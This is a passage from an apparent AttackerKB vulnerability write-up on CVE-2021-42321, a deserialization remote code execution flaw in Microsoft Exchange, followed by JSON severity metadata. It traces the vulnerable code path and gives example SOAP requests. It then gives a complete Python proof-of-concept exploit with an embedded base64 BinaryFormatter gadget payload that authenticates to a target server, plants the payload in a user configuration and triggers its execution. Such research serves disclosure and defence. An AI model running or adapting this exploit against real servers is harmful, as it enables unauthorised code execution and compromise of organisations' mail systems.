\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0new SingleResponseMessage(base.Result.Code, base.Result.Exception) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}; \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0private static UserConfiguration CreateInstance(UserConfigurationName userConfigurationName) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return userConfigurationName.MailboxSession.UserConfigurationManager.CreateFolderConfiguration(userConfigurationName.Name, UserConfigurationTypes.Stream | UserConfigurationTypes.XML | UserConfigurationTypes.Dictionary, userConfigurationName.FolderId); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch (ObjectExistedException ex) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ExTraceGlobals.ExceptionTracer.TraceError(0L, \"ObjectExistedException during UserConfiguration creation: {0} Name {1} FolderId: {2}\", ex, userConfigurationName.Name, userConfigurationName.FolderId); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw new ErrorItemSaveException(CoreResources.IDs.ErrorItemSaveUserConfigurationExists, ex); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0internal override ServiceResult<ServiceResultNone> Execute() \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0UserConfigurationCommandBase<CreateUserConfigurationRequest, ServiceResultNone>.ValidatePropertiesForUpdate(serviceUserConfiguration); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0using (UserConfiguration userConfiguration = CreateInstance(GetUserConfigurationName(serviceUserConfiguration.UserConfigurationName))) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0UserConfigurationCommandBase<CreateUserConfigurationRequest, ServiceResultNone>.SetProperties(serviceUserConfiguration, userConfiguration); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0userConfiguration.Save(); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return new ServiceResult<ServiceResultNone>(new ServiceResultNone()); \n \u00a0\u00a0\u00a0\u00a0} \n }\n \n\nLets take a deeper look into the `SetProperties()` code:\n \n \n // Microsoft.Exchange.Services.Core.UserConfigurationCommandBase<TRequestType,SingleItemType> \n using Microsoft.Exchange.Data.Storage; \n using Microsoft.Exchange.Services.Core.Types; \n \n protected static void SetProperties(ServiceUserConfiguration serviceUserConfiguration, UserConfiguration userConfiguration) \n { \n \u00a0\u00a0\u00a0\u00a0SetDictionary(serviceUserConfiguration, userConfiguration); \n \u00a0\u00a0\u00a0\u00a0SetXmlStream(serviceUserConfiguration, userConfiguration); \n \u00a0\u00a0\u00a0\u00a0SetStream(serviceUserConfiguration, userConfiguration); \n }\n \n\nAh, interesting, so `SetProperties()` sets both an XML stream with `SetXmlStream()` and sets another stream, likely binary, with `SetStream()`. Lets confirm this is using the `BinaryData` field mentioned earlier by looking at the code for `SetStream()`:\n \n \n // Microsoft.Exchange.Services.Core.UserConfigurationCommandBase<TRequestType,SingleItemType> \n using System.IO; \n using Microsoft.Exchange.Data.Storage; \n using Microsoft.Exchange.Services.Core.Types; \n \n private static void SetStream(ServiceUserConfiguration serviceUserConfiguration, UserConfiguration userConfiguration) \n { \n \u00a0\u00a0\u00a0\u00a0if (serviceUserConfiguration.BinaryData == null) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return; \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0using Stream stream = GetStream(userConfiguration); \n \u00a0\u00a0\u00a0\u00a0SetStreamPropertyFromBase64String(serviceUserConfiguration.BinaryData, stream, CoreResources.IDs.ErrorInvalidValueForPropertyBinaryData); \n }\n \n\nLooks like it is indeed using `serviceUserConfiguration.BinaryData`, confirming that this is the field we need to set in order to set the stream. **Note that the `BinaryData` blob must be a Base64 encoded string due to the `SetStreamPropertyFromBase64String()` call here.**\n\nSo therefore our chain to create a `ServiceUserConfiguration` object with a `BinaryData` stream looks like this:\n \n \n CreateUserConfiguration.Execute()\n \tUserConfigurationCommandBase.SetProperties()\n \t\tUserConfigurationCommandBase.SetStream()\t\t\t\n \n\n# Chaining Everything Together\n\nSo looks like first we need to make the `UserConfiguration` and apply that. We can do that via a web server SOAP request to `/EWS/Exchange.asmx` that looks like the following which will create a `UserConfiguration` object with a `Dictionary` XML element which as noted at <https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/dictionary>, defines a set of dictionary property entries for a user configuration object. These dictionary properties are controlled by a `DictionaryEntry` XML element which comprises a `DictionaryKey`, which has a `Type` field (aka type of the key) and a `Value` field (aka name of the key), and a `DictionaryValue` object which has the same fields used to control the value of the key.\n \n \n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"https://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"https://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"\n xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n \n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:CreateUserConfiguration>\n <m:UserConfiguration>\n <t:UserConfigurationName Name=\"TestConfig\">\n <t:Folder Id=\"id\" ChangeKey=\"id\">\n </t:Folder>\n </t:UserConfigurationName>\n \t\t<t:BinaryData>\n \t\t\tDESERIALIZE_PAYLOAD_GOES_HERE_AS_BASE64_ENCODED_STRING\n \t\t</t:BinaryData>\n <t:Dictionary>\n <t:DictionaryEntry>\n <t:DictionaryKey>\n <t:Type>String</t:Type>\n <t:Value>PhoneNumber</t:Value>\n </t:DictionaryKey>\n <t:DictionaryValue>\n <t:Type>String</t:Type>\n <t:Value>555-555-1111</t:Value>\n </t:DictionaryValue>\n </t:DictionaryEntry>\n </t:Dictionary>\n </m:UserConfiguration> \n </m:CreateUserConfiguration>\n </soap:Body>\n </soap:Envelope>\n \n\n# Tracing the Deserialization Back to An Accessible Source\n\nAfter a lot of tracing through interfaces we finally end up getting the following full deserialization chain from an accessible source. As you can see its quite long at 24 calls (including interfaces, so probably around 18 or so actual calls, but still its a lot!!!)\n \n \n \tMicrosoft.Exchange.Services.Core.GetClientAccessToken.PreExecuteCommand()\n \tMicrosoft.Exchange.Services.Core.GetClientAccessToken.PrepareForExtensionRelatedTokens()\n \tMicrosoft.Exchange.Services.Core.GetClientAccessToken.GetUserExtensionDataList(HashSet<string>)\n \tMicrosoft.Exchange.Services.Wcf.GetExtensibilityContext.GetUserExtensionDataListWithoutUpdatingCache(ICallContext, HashSet<string>)\n \tMicrosoft.Exchange.Services.Wcf.GetExtensibilityContext.GetUserExtensions(ICallContext, bool, bool, bool, ExtensionsCache, HashSet<OfficeMarketplaceExtension>, bool, bool, bool, Version, bool)\n \tMicrosoft.Exchange.Services.Wcf.GetExtensibilityContext.GetExtensions(ICallContext, bool, bool, bool, OrgEmptyMasterTableCache, ExtensionsCache, HashSet<OfficeMarketplaceExtension>, bool, bool, int?, bool, out string, bool, bool, Version, bool) \n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.InstalledExtensionTable.GetExtensions(HashSet<OfficeMarketplaceExtension>, bool, bool, bool, out string, CultureInfo, bool, bool, MultiValuedProperty<Capability>, bool)\n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.InstalledExtensionTable.GetProvidedExtensions(HashSet<OfficeMarketplaceExtension>, bool, Dictionary<string,ExtensionData>, bool, bool, out string, bool)\n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.InstalledExtensionTable.GetOrgProvidedExtensions(HashSet<OfficeMarketplaceExtension>, bool, Dictionary<string,ExtensionData>, bool, bool, out string, bool)\n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionTable.GetOrgExtensions(IOrgExtensionDataGetter, OrgExtensionRetrievalContext, bool, bool)\n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.IOrgExtensionDataGetter.GetAllOrgExtensionData(OrgExtensionRetrievalContext): IEnumerable<IExtensionData>\n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionDataGetter.GetAllOrgExtensionData(OrgExtensionRetrievalContext): IEnumerable<IExtensionData>\n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.IOrgExtensionRetriever.Retrieve(OrgExtensionRetrievalContext)\n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.CachedOrgExtensionRetriever.Retrieve(OrgExtensionRetrievalContext) : OrgExtensionRetrievalResult\n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.CachedOrgExtensionRetriever.TryDeserializeExtensionsFromCache(out OrgExtensionRetrievalresult)\n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.IOrgExtensionSerializer.TryDeserialize(IUserConfiguration, out OrgExtensionRetrievalResult, out Exception)\n \tMicrosoft.Exchange.Data.ApplicationLogic.Extension.OrgExtensionSerializer.TryDeserialize(IUserConfiguration, out OrgExtensionRetrievalResult, out Exception)\n \t\tMicrosoft.Exchange.Data.ApplicationLogic.Extension.IClientExtensionCollectionFormatter.Deserialize\n \t\t\tMicrosoft.Exchange.Data.ApplicationLogic.Extension.ClientExtensionCollectionFormatter.Deserialize(Stream)\n \t\t\t\tTypedBinaryFormatter.DeserializeObject(Stream, TypeBinder)\n \t\t\t\t\tTypedBinaryFormatter.Deserialize(Stream)\n \t\t\t\t\t\tSystem.Security.Claims.ClaimsPrincipal.OnDeserializedMethod() \n \t\t\t\t\t\t System.Security.Claims.ClaimsPrincipal.DeserializeIdentities() \n \t\t\t\t\t\t BinaryFormatter.Deserialize()\n \n\nWe need to find a way to hit this function from an accessible location. **I made a mistake here in thinking that cause we were retrieving info from the cache it wouldn\u2019t be an exploitable path. Don\u2019t assume based purely off of names the whole path chain, take a look at everything first.**\n\nAnyway we can then find that by Googling `GetClientAccessToken` that we can make a SOAP request for this given documentation at <https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/getclientaccesstoken-operation> and that `The GetClientAccessToken operation gets a client access token for a mail app for Outlook.` mean that its real purpose is simply to get a client token for a given mail app in Outlook. Interesting that such a benign operation triggers this chain bug it does make sense. After all some of this is getting the list of extensions for a given org, likely to find the respective app, which then leads us to the `Microsoft.Exchange.Data.ApplicationLogic.Extension.CachedOrgExtensionRetriever.TryDeserializeExtensionsFromCache(out OrgExtensionRetrievalresult)` call that ultimately leads to more calls and the then the `TypedBinaryFormatter.Deserialize(Stream)` call where the bug is at.\n\nFor reference the data we need to send here will look something like this:\n \n \n <?xml version=\"1.0\" encoding=\"UTF-8\"?> \n <soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:t=\"https://schemas.microsoft.com/exchange/services/2006/types\" xmlns:m=\"https://schemas.microsoft.com/exchange/services/2006/messages\"> \n \t<soap:Header> \n \t\t<t:RequestServerVersion Version=\"Exchange2013\" /> \n \t</soap:Header> \n \t<soap:Body> \n \t\t<m:GetClientAccessToken> \n \t\t\t<m:TokenRequests> \n \t\t\t\t<t:TokenRequest> \n \t\t\t\t\t<t:Id>1C50226D-04B5-4AB2-9FCD-42E236B59E4B</t:Id> \n \t\t\t\t\t<t:TokenType>CallerIdentity</t:TokenType>\n \t\t\t\t</t:TokenRequest> \n \t\t\t</m:TokenRequests> \n \t\t</m:GetClientAccessToken> \n \t</soap:Body> \n </soap:Envelope>\n \n\n# Shell\n\nFollowing PoC will spawn `calc.exe` on the target:\n \n \n #!/usr/bin/python3\n import socket, time\n \n import http.client, requests\n import urllib.request, urllib.parse, urllib.error\n import os, ssl\n \n from requests_ntlm2 import HttpNtlmAuth\n from urllib3.exceptions import InsecureRequestWarning\n \n requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n import base64\n \n \n USER = 'TESTINGDOMAIN\\\\administrator'\n PASS = 'thePassword123!'\n \n target = \"https://172.26.247.94\"\n \n #rcegadget\n #pop calc or mspaint on the target\n gadgetData = 'AAEAAAD/////AQAAAAAAAAAEAQAAACZTeXN0ZW0uU2VjdXJpdHkuQ2xhaW1zLkNsYWltc1ByaW5jaXBhbAEAAAAcbV9zZXJpYWxpemVkQ2xhaW1zSWRlbnRpdGllcwEGBQAAALAXQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFFbFRlWE4wWlcwc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVCUUVBQUFDRUFWTjVjM1JsYlM1RGIyeHNaV04wYVc5dWN5NUhaVzVsY21sakxsTnZjblJsWkZObGRHQXhXMXRUZVhOMFpXMHVVM1J5YVc1bkxDQnRjMk52Y214cFlpd2dWbVZ5YzJsdmJqMDBMakF1TUM0d0xDQkRkV3gwZFhKbFBXNWxkWFJ5WVd3c0lGQjFZbXhwWTB0bGVWUnZhMlZ1UFdJM04yRTFZelUyTVRrek5HVXdPRGxkWFFRQUFBQUZRMjkxYm5RSVEyOXRjR0Z5WlhJSFZtVnljMmx2YmdWSmRHVnRjd0FEQUFZSWpRRlRlWE4wWlcwdVEyOXNiR1ZqZEdsdmJuTXVSMlZ1WlhKcFl5NURiMjF3WVhKcGMyOXVRMjl0Y0dGeVpYSmdNVnRiVTNsemRHVnRMbE4wY21sdVp5d2diWE5qYjNKc2FXSXNJRlpsY25OcGIyNDlOQzR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmoxaU56ZGhOV00xTmpFNU16UmxNRGc1WFYwSUFnQUFBQUlBQUFBSkF3QUFBQUlBQUFBSkJBQUFBQVFEQUFBQWpRRlRlWE4wWlcwdVEyOXNiR1ZqZEdsdmJuTXVSMlZ1WlhKcFl5NURiMjF3WVhKcGMyOXVRMjl0Y0dGeVpYSmdNVnRiVTNsemRHVnRMbE4wY21sdVp5d2diWE5qYjNKc2FXSXNJRlpsY25OcGIyNDlOQzR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmoxaU56ZGhOV00xTmpFNU16UmxNRGc1WFYwQkFBQUFDMTlqYjIxd1lYSnBjMjl1QXlKVGVYTjBaVzB1UkdWc1pXZGhkR1ZUWlhKcFlXeHBlbUYwYVc5dVNHOXNaR1Z5Q1FVQUFBQVJCQUFBQUFJQUFBQUdCZ0FBQUFvdll5QmpiV1F1WlhobEJnY0FBQUFEWTIxa0JBVUFBQUFpVTNsemRHVnRMa1JsYkdWbllYUmxVMlZ5YVdGc2FYcGhkR2x2YmtodmJHUmxjZ01BQUFBSVJHVnNaV2RoZEdVSGJXVjBhRzlrTUFkdFpYUm9iMlF4QXdNRE1GTjVjM1JsYlM1RVpXeGxaMkYwWlZObGNtbGhiR2w2WVhScGIyNUliMnhrWlhJclJHVnNaV2RoZEdWRmJuUnllUzlUZVhOMFpXMHVVbVZtYkdWamRHbHZiaTVOWlcxaVpYSkpibVp2VTJWeWFXRnNhWHBoZEdsdmJraHZiR1JsY2k5VGVYTjBaVzB1VW1WbWJHVmpkR2x2Ymk1TlpXMWlaWEpKYm1adlUyVnlhV0ZzYVhwaGRHbHZia2h2YkdSbGNna0lBQUFBQ1FrQUFBQUpDZ0FBQUFRSUFBQUFNRk41YzNSbGJTNUVaV3hsWjJGMFpWTmxjbWxoYkdsNllYUnBiMjVJYjJ4a1pYSXJSR1ZzWldkaGRHVkZiblJ5ZVFjQUFBQUVkSGx3WlFoaGMzTmxiV0pzZVFaMFlYSm5aWFFTZEdGeVoyVjBWSGx3WlVGemMyVnRZbXg1RG5SaGNtZGxkRlI1Y0dWT1lXMWxDbTFsZEdodlpFNWhiV1VOWkdWc1pXZGhkR1ZGYm5SeWVRRUJBZ0VCQVFNd1UzbHpkR1Z0TGtSbGJHVm5ZWFJsVTJWeWFXRnNhWHBoZEdsdmJraHZiR1JsY2l0RVpXeGxaMkYwWlVWdWRISjVCZ3NBQUFDd0FsTjVjM1JsYlM1R2RXNWpZRE5iVzFONWMzUmxiUzVUZEhKcGJtY3NJRzF6WTI5eWJHbGlMQ0JXWlhKemFXOXVQVFF1TUM0d0xqQXNJRU4xYkhSMWNtVTlibVYxZEhKaGJDd2dVSFZpYkdsalMyVjVWRzlyWlc0OVlqYzNZVFZqTlRZeE9UTTBaVEE0T1Ywc1cxTjVjM1JsYlM1VGRISnBibWNzSUcxelkyOXliR2xpTENCV1pYSnphVzl1UFRRdU1DNHdMakFzSUVOMWJIUjFjbVU5Ym1WMWRISmhiQ3dnVUhWaWJHbGpTMlY1Vkc5clpXNDlZamMzWVRWak5UWXhPVE0wWlRBNE9WMHNXMU41YzNSbGJTNUVhV0ZuYm05emRHbGpjeTVRY205alpYTnpMQ0JUZVhOMFpXMHNJRlpsY25OcGIyNDlOQzR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmoxaU56ZGhOV00xTmpFNU16UmxNRGc1WFYwR0RBQUFBRXR0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RrS0JnMEFBQUJKVTNsemRHVnRMQ0JXWlhKemFXOXVQVFF1TUM0d0xqQXNJRU4xYkhSMWNtVTlibVYxZEhKaGJDd2dVSFZpYkdsalMyVjVWRzlyWlc0OVlqYzNZVFZqTlRZeE9UTTBaVEE0T1FZT0FBQUFHbE41YzNSbGJTNUVhV0ZuYm05emRHbGpjeTVRY205alpYTnpCZzhBQUFBRlUzUmhjblFKRUFBQUFBUUpBQUFBTDFONWMzUmxiUzVTWldac1pXTjBhVzl1TGsxbGJXSmxja2x1Wm05VFpYSnBZV3hwZW1GMGFXOXVTRzlzWkdWeUJ3QUFBQVJPWVcxbERFRnpjMlZ0WW14NVRtRnRaUWxEYkdGemMwNWhiV1VKVTJsbmJtRjBkWEpsQ2xOcFoyNWhkSFZ5WlRJS1RXVnRZbVZ5Vkhsd1pSQkhaVzVsY21salFYSm5kVzFsYm5SekFRRUJBUUVBQXdnTlUzbHpkR1Z0TGxSNWNHVmJYUWtQQUFBQUNRMEFBQUFKRGdBQUFBWVVBQUFBUGxONWMzUmxiUzVFYVdGbmJtOXpkR2xqY3k1UWNtOWpaWE56SUZOMFlYSjBLRk41YzNSbGJTNVRkSEpwYm1jc0lGTjVjM1JsYlM1VGRISnBibWNwQmhVQUFBQStVM2x6ZEdWdExrUnBZV2R1YjNOMGFXTnpMbEJ5YjJObGMzTWdVM1JoY25Rb1UzbHpkR1Z0TGxOMGNtbHVaeXdnVTNsemRHVnRMbE4wY21sdVp5a0lBQUFBQ2dFS0FBQUFDUUFBQUFZV0FBQUFCME52YlhCaGNtVUpEQUFBQUFZWUFBQUFEVk41YzNSbGJTNVRkSEpwYm1jR0dRQUFBQ3RKYm5Rek1pQkRiMjF3WVhKbEtGTjVjM1JsYlM1VGRISnBibWNzSUZONWMzUmxiUzVUZEhKcGJtY3BCaG9BQUFBeVUzbHpkR1Z0TGtsdWRETXlJRU52YlhCaGNtVW9VM2x6ZEdWdExsTjBjbWx1Wnl3Z1UzbHpkR1Z0TGxOMGNtbHVaeWtJQUFBQUNnRVFBQUFBQ0FBQUFBWWJBQUFBY1ZONWMzUmxiUzVEYjIxd1lYSnBjMjl1WURGYlcxTjVjM1JsYlM1VGRISnBibWNzSUcxelkyOXliR2xpTENCV1pYSnphVzl1UFRRdU1DNHdMakFzSUVOMWJIUjFjbVU5Ym1WMWRISmhiQ3dnVUhWaWJHbGpTMlY1Vkc5clpXNDlZamMzWVRWak5UWXhPVE0wWlRBNE9WMWRDUXdBQUFBS0NRd0FBQUFKR0FBQUFBa1dBQUFBQ2dzPQs='\n \n \n def sendPayload(gadgetChain):\n \tget_inbox = '''<?xml version=\"1.0\" encoding=\"utf-8\"?>\n \t<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n \t <soap:Header>\n \t\t<t:RequestServerVersion Version=\"Exchange2013\" />\n \t </soap:Header>\n \t <soap:Body>\n \t\t<m:GetFolder>\n \t\t <m:FolderShape>\n \t\t\t<t:BaseShape>AllProperties</t:BaseShape>\n \t\t </m:FolderShape>\n \t\t <m:FolderIds>\n \t\t\t<t:DistinguishedFolderId Id=\"inbox\" />\n \t\t </m:FolderIds>\n \t\t</m:GetFolder>\n \t </soap:Body>\n \t</soap:Envelope>\n \t'''\n \n \theaders = {\"User-Agent\": \"ExchangeServicesClient/15.01.2308.008\", \"Content-type\" : \"text/xml; charset=utf-8\"}\n \n \tres = requests.post(target + \"/ews/exchange.asmx\",\n \t\t\t\tdata=get_inbox,\n \t\t\t\theaders=headers,\n \t\t\t\t\t\t\tverify=False,\n \t\t\t\t\t\t\tauth=HttpNtlmAuth('%s' % (USER),\n \t\t\t\t\t\t\tPASS))\n \n \tprint(res.text + \"\\r\\n\")\n \tprint(res.encoding + \"\\r\\n\")\n \n \tfolderId = res.text.split('<t:FolderId Id=\"')[1].split('\"')[0]\n \tchangeKey = res.text.split('<t:FolderId Id=\"' + folderId + '\" ChangeKey=\"')[1].split('\"')[0]\n \n \tprint(folderId + \"\\r\\n\")\n \tprint(changeKey + \"\\r\\n\")\n \n \tdelete_old = '''<?xml version=\"1.0\" encoding=\"utf-8\"?>\n \t<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n \t <soap:Header>\n \t\t<t:RequestServerVersion Version=\"Exchange2013\" />\n \t </soap:Header>\n \t <soap:Body>\n \t\t<m:DeleteUserConfiguration>\n \t\t <m:UserConfigurationName Name=\"ExtensionMasterTable\">\n \t\t\t<t:FolderId Id=\"%s\" ChangeKey=\"%s\" />\n \t\t </m:UserConfigurationName>\n \t\t</m:DeleteUserConfiguration>\n \t </soap:Body>\n \t</soap:Envelope>''' % (folderId, changeKey)\n \n \tres = requests.post(target + \"/ews/exchange.asmx\",\n \t\t\t\tdata=delete_old,\n \t\t\t\theaders=headers,\n \t\t\t\t\t\t\tverify=False,\n \t\t\t\t\t\t\tauth=HttpNtlmAuth('%s' % (USER),\n \t\t\t\t\t\t\tPASS))\n \n \tprint(res.text)\n \tprint(\"\\r\\n\")\n \n \tcreate_usr_cfg = '''<?xml version=\"1.0\" encoding=\"utf-8\"?>\n \t<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n \t <soap:Header>\n \t\t<t:RequestServerVersion Version=\"Exchange2013\" />\n \t </soap:Header>\n \t <soap:Body>\n \t\t<m:CreateUserConfiguration>\n \t\t <m:UserConfiguration>\n \t\t\t<t:UserConfigurationName Name=\"ExtensionMasterTable\">\n \t\t\t <t:FolderId Id=\"%s\" ChangeKey=\"%s\" />\n \t\t\t</t:UserConfigurationName>\n \t\t\t<t:Dictionary>\n \t\t\t <t:DictionaryEntry>\n \t\t\t\t<t:DictionaryKey>\n \t\t\t\t <t:Type>String</t:Type>\n \t\t\t\t <t:Value>OrgChkTm</t:Value>\n \t\t\t\t</t:DictionaryKey>\n \t\t\t\t<t:DictionaryValue>\n \t\t\t\t <t:Type>Integer64</t:Type>\n \t\t\t\t <t:Value>637728170914745525</t:Value>\n \t\t\t\t</t:DictionaryValue>\n \t\t\t </t:DictionaryEntry>\n \t\t\t <t:DictionaryEntry>\n \t\t\t\t<t:DictionaryKey>\n \t\t\t\t <t:Type>String</t:Type>\n \t\t\t\t <t:Value>OrgDO</t:Value>\n \t\t\t\t</t:DictionaryKey>\n \t\t\t\t<t:DictionaryValue>\n \t\t\t\t <t:Type>Boolean</t:Type>\n \t\t\t\t <t:Value>false</t:Value>\n \t\t\t\t</t:DictionaryValue>\n \t\t\t </t:DictionaryEntry>\n \t\t\t <t:DictionaryEntry>\n \t\t\t\t<t:DictionaryKey>\n \t\t\t\t <t:Type>String</t:Type>\n \t\t\t\t <t:Value>OrgExtV</t:Value>\n \t\t\t\t</t:DictionaryKey>\n \t\t\t\t<t:DictionaryValue>\n \t\t\t\t <t:Type>Integer32</t:Type>\n \t\t\t\t <t:Value>2147483647</t:Value>\n \t\t\t\t</t:DictionaryValue>\n \t\t\t </t:DictionaryEntry>\n \t\t\t</t:Dictionary>\n \t\t\t<t:BinaryData>%s</t:BinaryData>\n \t\t </m:UserConfiguration>\n \t\t</m:CreateUserConfiguration>\n \t </soap:Body>\n \t</soap:Envelope>''' % (folderId, changeKey, gadgetChain)\n \n \tres = requests.post(target + \"/ews/exchange.asmx\",\n \t\t\t\tdata=create_usr_cfg,\n \t\t\t\theaders=headers,\n \t\t\t\t\t\t\tverify=False,\n \t\t\t\t\t\t\tauth=HttpNtlmAuth('%s' % (USER),\n \t\t\t\t\t\t\tPASS))\n \n \tprint(res.text)\n \tprint(\"\\r\\n\")\n \tprint(\"Got the request sent, now to trigger deserialization!\\r\\n\\r\\n\")\n \n \tget_client_ext = '''<?xml version=\"1.0\" encoding=\"utf-8\"?>\n \t<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n \t <soap:Header>\n \t\t<t:RequestServerVersion Version=\"Exchange2013\" />\n \t </soap:Header>\n \t <soap:Body>\n \t\t<m:GetClientAccessToken>\n \t\t <m:TokenRequests>\n \t\t\t<t:TokenRequest>\n \t\t\t <t:Id>aaaa</t:Id>\n \t\t\t <t:TokenType>CallerIdentity</t:TokenType>\n \t\t\t</t:TokenRequest>\n \t\t </m:TokenRequests>\n \t\t</m:GetClientAccessToken>\n \t </soap:Body>\n \t</soap:Envelope>\n \t'''\n \n \tres = requests.post(target + \"/ews/exchange.asmx\",\n \t\t\t\tdata=get_client_ext,\n \t\t\t\theaders=headers,\n \t\t\t\t\t\t\tverify=False,\n \t\t\t\t\t\t\tauth=HttpNtlmAuth('%s' % (USER),\n \t\t\t\t\t\t\tPASS))\n \tprint(res.text)\n \tprint(\"\\r\\n\")\n \tprint(\"Triggered deserialization!\\r\\n\\r\\n\")\n \n sendPayload(gadgetData)\n \n\n# Notes\n\nProcess will spawn under the `w3wp.exe` process running `MSExchangeServicesAppPool`.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-42321", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": 